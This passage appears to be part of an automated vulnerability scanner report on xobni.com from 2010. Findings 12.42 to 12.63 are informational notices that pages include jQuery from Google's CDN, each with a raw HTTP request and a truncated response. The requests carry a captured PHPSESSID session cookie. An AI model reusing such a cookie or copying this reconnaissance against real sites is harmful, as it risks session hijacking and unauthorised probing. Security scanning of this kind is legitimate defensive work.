Content-Type: text/html;charset=UTF-8
Content-Length: 7685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni.com: Error<
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.42. http://www.xobni.com/facebook-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/facebook-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /facebook-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Facebook in Outlo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.43. http://www.xobni.com/fan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/fan

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /fan HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:05:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11294

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Share Your Love f
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.44. http://www.xobni.com/find-attachments previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/find-attachments

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /find-attachments HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12691

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Find and Organize
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.45. http://www.xobni.com/fr-fr/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/fr-fr/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /fr-fr/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Le plug-i
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.46. http://www.xobni.com/fr-fr/account. previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/fr-fr/account.

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

12.47. http://www.xobni.com/fr-fr/account/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/fr-fr/account/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<link rel='stylesheet' href='/csscache/1265760498/styles/account.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.48. http://www.xobni.com/fr-fr/legal/privacy. previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/fr-fr/legal/privacy.

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

12.49. http://www.xobni.com/fr-fr/legal/tos. previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/fr-fr/legal/tos.

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

12.50. http://www.xobni.com/get-salesforce previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/get-salesforce

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /get-salesforce HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:18:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13395

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Salesforce in Out
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.51. http://www.xobni.com/homepage/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

12.52. http://www.xobni.com/homepage/homeproducts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/homeproducts/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/homeproducts/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.53. http://www.xobni.com/homepage/homeproducts/subsfree_test previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/homeproducts/subsfree_test

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/homeproducts/subsfree_test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7946

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.54. http://www.xobni.com/homepage/homeproducts/subsplus_popup_test previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/homeproducts/subsplus_popup_test

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/homeproducts/subsplus_popup_test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:32 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7964

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.55. http://www.xobni.com/homepage/homeproducts/subsplus_test previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/homeproducts/subsplus_test

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/homeproducts/subsplus_test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

12.56. http://www.xobni.com/homepage/homeproducts/xobnifree previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/homeproducts/xobnifree

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/homeproducts/xobnifree HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=en
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.57. http://www.xobni.com/homepage/homeproducts/xobnimobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/homeproducts/xobnimobile

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/homeproducts/xobnimobile HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=en
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7814

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.58. http://www.xobni.com/homepage/homeproducts/xobniplus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/homeproducts/xobniplus

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/homeproducts/xobniplus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=en
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.59. http://www.xobni.com/homepage/productmenu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/productmenu/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/productmenu/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7739

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.60. http://www.xobni.com/homepage/productmenu/free previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/productmenu/free

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/productmenu/free HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7916

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.61. http://www.xobni.com/homepage/productmenu/mobilebb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/productmenu/mobilebb

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/productmenu/mobilebb HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.62. http://www.xobni.com/homepage/productmenu/plus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/productmenu/plus

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/productmenu/plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7916

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.63. http://www.xobni.com/homepage/productmenu/xobnione previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/homepage/productmenu/xobnione

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /homepage/productmenu/xobnione HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
